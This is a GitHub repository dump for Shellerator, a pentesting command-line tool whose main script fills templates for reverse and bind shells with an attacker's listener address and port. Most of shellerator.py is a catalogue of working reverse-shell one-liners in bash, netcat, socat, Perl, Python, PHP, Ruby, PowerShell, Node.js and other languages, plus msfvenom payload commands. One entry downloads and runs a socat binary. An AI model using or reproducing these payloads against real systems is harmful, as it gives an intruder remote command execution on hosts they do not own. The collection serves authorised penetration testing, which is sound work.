├── requirements.txt ├── assets ├── example-menus.gif └── example-no-menus.gif ├── .gitignore ├── setup.py ├── README.md ├── shellerator.py └── LICENSE /requirements.txt: -------------------------------------------------------------------------------- 1 | simple_term_menu 2 | colorama 3 | argparse 4 | console-menu 5 | psutil 6 | -------------------------------------------------------------------------------- /assets/example-menus.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ShutdownRepo/shellerator/HEAD/assets/example-menus.gif -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # PyCharm workspace 2 | .idea/ 3 | 4 | # Python install files 5 | build/ 6 | dist/ 7 | *.egg-info/ -------------------------------------------------------------------------------- /assets/example-no-menus.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ShutdownRepo/shellerator/HEAD/assets/example-no-menus.gif -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | import shutil 2 | import os 3 | from setuptools import setup 4 | 5 | with open('README.md', 'r', encoding='utf-8') as f: 6 | long_description = f.read() 7 | 8 | with open('requirements.txt', 'r', encoding='utf-8') as f: 9 | content = f.readlines() 10 | requirements = [x.strip() for x in content] 11 | 12 | shutil.copyfile('shellerator.py', 'shellerator') 13 | 14 | setup( 15 | name='shellerator', 16 | version='1.0.0', 17 | author='Shutdown', 18 | description='Simple CLI tool for the generation of bind and reverse shells in multiple languages ', 19 | long_description=long_description, 20 | long_description_content_type='text/markdown', 21 | url='https://github.com/ShutdownRepo/shellerator', 22 | classifiers=[ 23 | 'Environment :: Console' 24 | 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)', 25 | 'Operating System :: POSIX :: Linux', 26 | 'Programming Language :: Python :: 3', 27 | 'Topic :: Security', 28 | ], 29 | python_requires='>=3.6', 30 | install_requires=requirements, 31 | scripts=['shellerator'] 32 | ) 33 | 34 | os.remove('shellerator') 35 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Shellerator 2 | Shellerator is a simple command-line tool aimed to help pentesters quickly generate one-liner reverse/bind shells in multiple languages (Bash, Powershell, Java, Python...). 3 | Another similar project for the generation of one-line file downloading commands is based on this code [Uberfile](https://github.com/ShutdownRepo/uberfile) 4 | 5 | This project is installed by default in the pentesting OS [Exegol](https://github.com/ShutdownRepo/Exegol) 6 | 7 | ![Example (with menus)](https://raw.githubusercontent.com/ShutdownRepo/shellerator/master/assets/example-menus.gif) 8 | 9 | # Install 10 | The install is pretty simple, just clone this git and install the requirements. 11 | ``` 12 | git clone https://github.com/ShutdownRepo/shellerator 13 | cd shellerator 14 | python3 setup.py install --user 15 | ``` 16 | 17 | # Usage 18 | Usage is dead simple too. 19 | ``` 20 | usage: shellerator.py [-h] [-b | -r] [-t TYPE] [-p LPORT] [-i LHOST] 21 | 22 | Generate a bind/reverse shell 23 | 24 | optional arguments: 25 | -h, --help show this help message and exit 26 | -l, --list Print all the types of shells shellerator can generate 27 | -b, --bind-shell Generate a bind shell (you connect to the target) 28 | -r, --reverse-shell Generate a reverse shell (the target connects to you)(Default) 29 | 30 | Bind shell options: 31 | -t TYPE, --type TYPE Type of the shell to generate (Bash, Powershell, Java...) 32 | -p LPORT, --port LPORT Listener Port 33 | 34 | Reverse shell options: 35 | -t TYPE, --type TYPE Type of the shell to generate (Bash, Powershell, Java...) 36 | -i LHOST, --ip LHOST Listener IP address 37 | -p LPORT, --port LPORT Listener Port 38 | ``` 39 | If required options are not set, the tool will start in TUI (Terminal User Interface) with pretty menus but CLI works like a charm too. 40 | 41 | ![Example (without menus)](https://raw.githubusercontent.com/ShutdownRepo/shellerator/master/assets/example-no-menus.gif) 42 | 43 | # To-Do List 44 | ## Things to add 45 | Here are some things to add that I have in mind, I'll work on that asap 46 | - Add bindshells 47 | - Add encrypted shells and separate them from bind/rev ? 48 | - Add webshells 49 | - Add some kind of option to help user get info on how to improve shell/tty (rlwrap, stty, ConPty (cf. PayloadsAllTheThings)) 50 | 51 | # Sources & credits 52 | This project is inspired by [Print-My-Shell](https://github.com/sameera-madushan/Print-My-Shell/). 53 | Some commands come from the following links 54 | - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md 55 | - http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 56 | - https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/ 57 | - https://ashr.net/bind/and/reverse/shell/cheatsheet/windows/and/linux.aspx 58 | -------------------------------------------------------------------------------- /shellerator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # Author: Charlie BROMBERG (Shutdown - @_nwodtuhs) 3 | 4 | ''' 5 | Inspired by : https://github.com/sameera-madushan/Print-My-Shell 6 | Reverse shells found on : 7 | - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md 8 | - http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 9 | - https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/ 10 | - https://ashr.net/bind/and/reverse/shell/cheatsheet/windows/and/linux.aspx 11 | - https://krober.biz/misc/reverse_shell.php 12 | ''' 13 | 14 | import argparse 15 | import sys 16 | import re 17 | import psutil 18 | import socket 19 | from colorama import Fore 20 | from colorama import Style 21 | import platform 22 | if platform.system() == 'Windows': 23 | from consolemenu import * 24 | else: 25 | from simple_term_menu import TerminalMenu 26 | 27 | def menu(title, menu_list): 28 | if platform.system() == 'Windows': 29 | selection = SelectionMenu.get_selection(menu_list, title=title, show_exit_option=False) 30 | else: 31 | menu = TerminalMenu(menu_list, title=title) 32 | selection = menu.show() 33 | return menu_list[selection] 34 | 35 | def menu_with_custom_choice(title, menu_list): 36 | menu_list.append('Custom') 37 | selection = menu(title, menu_list) 38 | if selection == 'Custom': 39 | print(f'(custom) {title}') 40 | if platform.system() == 'Windows': 41 | selection = input('>> ') 42 | else: 43 | selection = input(Fore.RED + Style.BRIGHT + '> ' + Style.RESET_ALL) 44 | return selection 45 | else: 46 | return selection.split('(')[1].split(')')[0] 47 | 48 | def select_address(): 49 | interfaces = {} 50 | net_if_addrs = psutil.net_if_addrs() 51 | for iface, addr in net_if_addrs.items(): 52 | if iface == 'lo': 53 | continue 54 | for address in addr: 55 | if address.family == socket.AF_INET: 56 | interfaces.update({iface:address.address}) 57 | 58 | menu_list = [] 59 | for key in interfaces: 60 | menu_list.append(key + ' (' + interfaces[key] + ')') 61 | 62 | return menu_with_custom_choice("Listener interface/address?", menu_list) 63 | 64 | def list_shells(): 65 | print(Fore.BLUE + Style.BRIGHT + 'Reverse shells' + Style.RESET_ALL) 66 | for shell in sorted(revshells.keys()): 67 | print(' - ' + shell) 68 | print() 69 | print(Fore.BLUE + Style.BRIGHT + 'Bind shells' + Style.RESET_ALL) 70 | for shell in sorted(bindshells.keys()): 71 | print(' - ' + shell) 72 | quit() 73 | 74 | def get_options(): 75 | parser = argparse.ArgumentParser(description='Generate a bind/reverse shell', formatter_class=argparse.RawTextHelpFormatter) 76 | parser.add_argument('-l', '--list', dest='LIST', action='store_true', help='Print all the types of shells shellerator can generate') 77 | # Can't choose bind shell and reverse shell 78 | shelltype = parser.add_mutually_exclusive_group() 79 | shelltype.add_argument('-b', '--bind-shell', dest='SHELLTYPE', action='store_const', const='bindshells', help='Generate a bind shell (you connect to the target)') 80 | shelltype.add_argument('-r', '--reverse-shell', dest='SHELLTYPE', action='store_const', const='revshells', help='Generate a reverse shell (the target connects to you) (Default)') 81 | # Sets reverse shell as default value for SHELLTYPE (https://stackoverflow.com/questions/38507675/python-argparse-mutually-exclusive-group-with-default-if-no-argument-is-given) 82 | parser.set_defaults(SHELLTYPE = 'revshells') 83 | # Creates group of options for bindshell 84 | bindshell = parser.add_argument_group('Bind shell options') 85 | # typeoptions and portoption are two options either bindshell or revshell will need (https://stackoverflow.com/questions/23775378/allowing-same-option-in-different-argparser-group) 86 | typeoption = bindshell.add_argument('-t', '--type', dest='TYPE', type=str.lower, help='Type of the shell to generate (Bash, Powershell, Java...)') 87 | portoption = bindshell.add_argument('-lp', '--lport', dest='LPORT', type=str, help='Listener Port') 88 | revshell = parser.add_argument_group('Reverse shell options') 89 | revshell._group_actions.append(typeoption) 90 | revshell.add_argument('-lh', '--lhost', dest='LHOST', type=str, help='Listener IP address') 91 | revshell._group_actions.append(portoption) 92 | options = parser.parse_args() 93 | if options.LIST: 94 | list_shells() 95 | if options.SHELLTYPE == 'revshells' and not options.LHOST: 96 | options.LHOST = select_address() 97 | if not options.LPORT: 98 | menu_list = [ 99 | 'L33t (1337)', 100 | 'HTTPS (443)', 101 | 'HTTP (80)', 102 | 'DNS (53)', 103 | ] 104 | options.LPORT = menu_with_custom_choice("Listener port?", menu_list) 105 | if not options.TYPE: 106 | shells_dict = globals()[options.SHELLTYPE] 107 | menu_list = sorted(list(shells_dict.keys())) 108 | options.TYPE = menu('What type of shell do you want?', menu_list) 109 | return options 110 | 111 | # Helper function for populate_shells() to add values to the dictionnaries 112 | def add_shell(shells_dict, type, shell, notes=None): 113 | if not type in shells_dict.keys(): 114 | shells = [] 115 | else: 116 | shells = shells_dict[type] 117 | shells.append((notes, shell)) 118 | shells_dict.update({type:shells}) 119 | 120 | # Add shells to the main dictionnaries: revshells and bindshells 121 | def populate_shells(): 122 | add_shell(revshells, 'bash', '''/bin/bash -c '/bin/bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1' ''') 123 | add_shell(revshells, 'bash', '''/bin/bash -c '/bin/bash -i > /dev/tcp/{LHOST}/{LPORT} 0<&1 2>&1' ''') 124 | add_shell(revshells, 'bash', '''/bin/bash -i > /dev/tcp/{LHOST}/{LPORT} 0<& 2>&1''') 125 | add_shell(revshells, 'bash', '''bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1''') 126 | add_shell(revshells, 'bash', '''exec 5<>/dev/tcp/{LHOST}/{LPORT};cat <&5 | while read line; do $line 2>&5 >&5; done''') 127 | add_shell(revshells, 'bash', '''exec /bin/sh 0&0 2>&0''') 128 | add_shell(revshells, 'bash', '''0<&196;exec 196<>/dev/tcp/{LHOST}/{LPORT}; sh <&196 >&196 2>&196''') 129 | add_shell(shells_dict=revshells, type='bash', notes='UDP', shell='''bash -i >& /dev/udp/{LHOST}/{LPORT} 0>&1''') 130 | add_shell(shells_dict=revshells, type='bash', notes='UDP Listener (attacker)', shell='''nc -u -lvp {LPORT}''') 131 | add_shell(revshells, 'netcat', '''nc -e /bin/sh {LHOST} {LPORT}''') 132 | add_shell(revshells, 'netcat', '''nc -e /bin/bash {LHOST} {LPORT}''') 133 | add_shell(revshells, 'netcat', '''nc -c bash {LHOST} {LPORT}''') 134 | add_shell(revshells, 'netcat', '''mknod backpipe p && nc {LHOST} {LPORT} 0backpipe ''') 135 | add_shell(revshells, 'netcat', '''rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {LHOST} {LPORT} >/tmp/f''') 136 | add_shell(revshells, 'netcat', '''rm -f /tmp/p; mknod /tmp/p p && nc {LHOST} {LPORT} 0/tmp/p 2>&1''') 137 | add_shell(revshells, 'netcat', '''rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc {LHOST} {LPORT} > f''') 138 | add_shell(revshells, 'netcat', '''rm -f x; mknod x p && nc {LHOST} {LPORT} 0x''') 139 | add_shell(revshells, 'ncat', '''ncat {LHOST} {LPORT} -e /bin/bash''') 140 | add_shell(revshells, 'ncat', '''ncat --udp {LHOST} {LPORT} -e /bin/bash''') 141 | add_shell(revshells, 'telnet', '''rm -f /tmp/p; mknod /tmp/p p && telnet {LHOST} {LPORT} 0/tmp/p 2>&1''') 142 | add_shell(revshells, 'telnet', '''telnet {LHOST} {LPORT} | /bin/bash | telnet {LHOST} 667''') 143 | add_shell(revshells, 'telnet', '''rm f;mkfifo f;cat f|/bin/sh -i 2>&1|telnet {LHOST} {LPORT} > f''') 144 | add_shell(revshells, 'telnet', '''rm -f x; mknod x p && telnet {LHOST} {LPORT} 0x''') 145 | add_shell(revshells, 'socat', '''/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{LHOST}:{LPORT}''') 146 | add_shell(revshells, 'socat', '''socat tcp-connect:{LHOST}:{LPORT} exec:"bash -li",pty,stderr,setsid,sigint,sane''') 147 | add_shell(revshells, 'socat', '''wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{LHOST}:{LPORT}''') 148 | add_shell(shells_dict=revshells, type='socat', notes='Listener (attacker)', shell='''socat file:`tty`,raw,echo=0 TCP-L:{LPORT}''') 149 | add_shell(revshells, 'perl', '''perl -e 'use Socket;$i="{LHOST}";$p={LPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ''') 150 | add_shell(revshells, 'perl', '''perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"{LHOST}:{LPORT}");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' ''') 151 | add_shell(shells_dict=revshells, type='perl', notes='Windows', shell='''perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"{LHOST}:{LPORT}");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' ''') 152 | add_shell(revshells, 'python', '''python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{LHOST}",{LPORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ''') 153 | add_shell(revshells, 'python', '''export RHOST="{LHOST}";export RPORT={LPORT};python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' ''') 154 | add_shell(revshells, 'python', '''python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{LHOST}",{LPORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' ''') 155 | add_shell(shells_dict=revshells, type='python', notes='Windows', shell='''C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('{LHOST}', {LPORT})), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"''') 156 | add_shell(revshells, 'php', '''php -r '$sock=fsockopen("{LHOST}",{LPORT});exec("/bin/sh -i <&3 >&3 2>&3");' ''') 157 | add_shell(revshells, 'php', '''php -r '$s=fsockopen("{LHOST}",{LPORT});$proc=proc_open("/bin/sh -i", array(0=>$s, 1=>$s, 2=>$s),$pipes);' ''') 158 | add_shell(revshells, 'php', '''php -r '$s=fsockopen("{LHOST}",{LPORT});shell_exec("/bin/sh -i <&3 >&3 2>&3");' ''') 159 | add_shell(revshells, 'php', '''php -r '$s=fsockopen("{LHOST}",{LPORT});`/bin/sh -i <&3 >&3 2>&3`;' ''') 160 | add_shell(revshells, 'php', '''php -r '$s=fsockopen("{LHOST}",{LPORT});system("/bin/sh -i <&3 >&3 2>&3");' ''') 161 | add_shell(revshells, 'php', '''php -r '$s=fsockopen("{LHOST}",{LPORT});popen("/bin/sh -i <&3 >&3 2>&3", "r");' ''') 162 | add_shell(revshells, 'php', '''php -r '$s=\'127.0.0.1\';$p=443;@error_reporting(0);@ini_set("error_log",NULL);@ini_set("log_errors",0);@set_time_limit(0);umask(0);if($s=fsockopen($s,$p,$n,$n)){if($x=proc_open(\'/bin/sh$IFS-i\',array(array(\'pipe\',\'r\'),array(\'pipe\',\'w\'),array(\'pipe\',\'w\')),$p,getcwd())){stream_set_blocking($p[0],0);stream_set_blocking($p[1],0);stream_set_blocking($p[2],0);stream_set_blocking($s,0);while(true){if(feof($s))die(\'connection/closed\');if(feof($p[1]))die(\'shell/not/response\');$r=array($s,$p[1],$p[2]);stream_select($r,$n,$n,null);if(in_array($s,$r))fwrite($p[0],fread($s,1024));if(in_array($p[1],$r))fwrite($s,fread($p[1],1024));if(in_array($p[2],$r))fwrite($s,fread($p[2],1024));}fclose($p[0]);fclose($p[1]);fclose($p[2]);proc_close($x);}else{die("proc_open/disabled");}}else{die("not/connect");}' ''') 163 | add_shell(revshells, 'ruby', '''ruby -rsocket -e'f=TCPSocket.open("{LHOST}",{LPORT}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ''') 164 | add_shell(revshells, 'ruby', '''ruby -rsocket -e 'exit if fork;c=TCPSocket.new("{LHOST}","{LPORT}");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ''') 165 | add_shell(shells_dict=revshells, type='ruby', notes='Windows', shell='''ruby -rsocket -e 'c=TCPSocket.new("{LHOST}","{LPORT}");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ''') 166 | add_shell(revshells, 'openssl', '''mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect {LHOST}:{LPORT} > /tmp/s; rm /tmp/s''') 167 | add_shell(shells_dict=revshells, type='openssl', notes='Listener (attacker)', shell='''ncat --ssl -vv -l -p {LPORT}''') 168 | add_shell(revshells, 'powershell', '''$client = New-Object System.Net.Sockets.TCPClient('{LHOST}',{LPORT});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()''') 169 | add_shell(revshells, 'awk', '''awk 'BEGIN {s = "/inet/tcp/0/{LHOST}/{LPORT}"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null''') 170 | add_shell(revshells, 'tclsh', '''echo 'set s [socket {LHOST} {LPORT}];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh''') 171 | add_shell(revshells, 'java', '''r = Runtime.getRuntime() 172 | p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/{LHOST}/{LPORT};cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) 173 | p.waitFor()''') 174 | add_shell(revshells, 'java', '''String host="{LPORT}"; 175 | int port={LPORT}; 176 | String cmd="cmd.exe"; 177 | Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();''') 178 | add_shell(shells_dict=revshells, type='java', notes='More stealthy', shell='''Thread thread = new Thread(){public void run(){ //Reverse shell here }}thread.start();''') 179 | add_shell(revshells, 'war', '''msfvenom -p java/jsp_shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f war > reverse.war 180 | strings reverse.war | grep jsp # in order to get the name of the file''') 181 | add_shell(shells_dict=revshells, type='lua', notes='Linux', shell='''lua -e "require('socket');require('os');t=socket.tcp();t:connect('{LHOST}','{LPORT}');os.execute('/bin/sh -i <&3 >&3 2>&3');"''') 182 | add_shell(shells_dict=revshells, type='lua', notes='Windows', shell='''lua5.1 -e 'local host, port = "{LHOST}", {LPORT} local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' ''') 183 | add_shell(revshells, 'nodejs', '''require('child_process').exec('nc -e /bin/sh {LHOST} {LPORT}')''') 184 | add_shell(revshells, 'nodejs', '''-var x = global.process.mainModule.require 185 | -x('child_process').exec('nc {LHOST} {LPORT} -e /bin/bash')''') 186 | add_shell(revshells, 'nodejs', '''(function(){ 187 | var net = require("net"), 188 | cp = require("child_process"), 189 | sh = cp.spawn("/bin/sh", []); 190 | var client = new net.Socket(); 191 | client.connect({LPORT}, "{LHOST}", function(){ 192 | client.pipe(sh.stdin); 193 | sh.stdout.pipe(client); 194 | sh.stderr.pipe(client); 195 | }); 196 | return /a/; // Prevents the Node.js application form crashing 197 | })();''') 198 | add_shell(revshells, 'groovy', '''String host="{LHOST}"; 199 | int port={LPORT}; 200 | String cmd="cmd.exe"; 201 | Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();''') 202 | add_shell(shells_dict=revshells, type='groovy', notes='More stealthy', shell='''Thread.start { // Reverse shell here }''') 203 | add_shell(revshells, 'meterpreter', '''msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="{LHOST}" LPORT={LPORT} -f elf > shell.elf''') 204 | add_shell(revshells, 'meterpreter', '''msfvenom -p windows/meterpreter/reverse_tcp LHOST="{LHOST}" LPORT={LPORT} -f exe > shell.exe''') 205 | add_shell(revshells, 'meterpreter', '''msfvenom -p osx/x86/shell_reverse_tcp LHOST="{LHOST}" LPORT={LPORT} -f macho > shell.macho''') 206 | add_shell(revshells, 'meterpreter', '''msfvenom -p windows/meterpreter/reverse_tcp LHOST="{LHOST}" LPORT={LPORT} -f asp > shell.asp''') 207 | add_shell(revshells, 'meterpreter', '''msfvenom -p java/jsp_shell_reverse_tcp LHOST="{LHOST}" LPORT={LPORT} -f raw > shell.jsp''') 208 | add_shell(revshells, 'meterpreter', '''msfvenom -p java/jsp_shell_reverse_tcp LHOST="{LHOST}" LPORT={LPORT} -f war > shell.war''') 209 | add_shell(revshells, 'meterpreter', '''msfvenom -p cmd/unix/reverse_python LHOST="{LHOST}" LPORT={LPORT} -f raw > shell.py''') 210 | add_shell(revshells, 'meterpreter', '''msfvenom -p cmd/unix/reverse_bash LHOST="{LHOST}" LPORT={LPORT} -f raw > shell.sh''') 211 | add_shell(revshells, 'meterpreter', '''msfvenom -p cmd/unix/reverse_perl LHOST="{LHOST}" LPORT={LPORT} -f raw > shell.pl''') 212 | add_shell(shells_dict=revshells, type='meterpreter', notes='Windows Staged reverse TCP', shell='''msfvenom -p windows/meterpreter/reverse_tcp LHOST={LHOST} LPORT={LPORT} -f exe > reverse.exe''') 213 | add_shell(shells_dict=revshells, type='meterpreter', notes='Windows Stageless reverse TCP', shell='''msfvenom -p windows/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f exe > reverse.exe''') 214 | add_shell(shells_dict=revshells, type='meterpreter', notes='Linux Staged reverse TCP', shell='''msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf >reverse.elf''') 215 | add_shell(shells_dict=revshells, type='meterpreter', notes='Linux Stageless reverse TCP', shell='''msfvenom -p linux/x86/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf >reverse.elf''') 216 | 217 | add_shell(bindshells, 'netcat', '''nc -lvp {LPORT} -e /bin/sh''') 218 | 219 | if __name__ == '__main__': 220 | revshells = {} 221 | bindshells = {} 222 | populate_shells() 223 | options = get_options() 224 | shells_dict = globals()[options.SHELLTYPE] 225 | print() 226 | for notes, shell in shells_dict[options.TYPE]: 227 | shell_index = shells_dict[options.TYPE].index((notes, shell)) + 1 228 | if options.LHOST is not None: 229 | print_shell = shell.replace('{LHOST}', options.LHOST).replace('{LPORT}', options.LPORT).strip() 230 | else: 231 | print_shell = shell.replace('{LPORT}', options.LPORT).strip() 232 | print_notes = '' 233 | if notes is not None: 234 | print_notes = notes + ' ' 235 | print(Fore.BLUE + Style.BRIGHT + '[' + str(shell_index) + '] ' + print_notes + Style.RESET_ALL + print_shell + '\n') 236 | if options.SHELLTYPE == "revshells": 237 | cmdline = f'{sys.argv[0]} --reverse-shell --type {options.TYPE} --lhost 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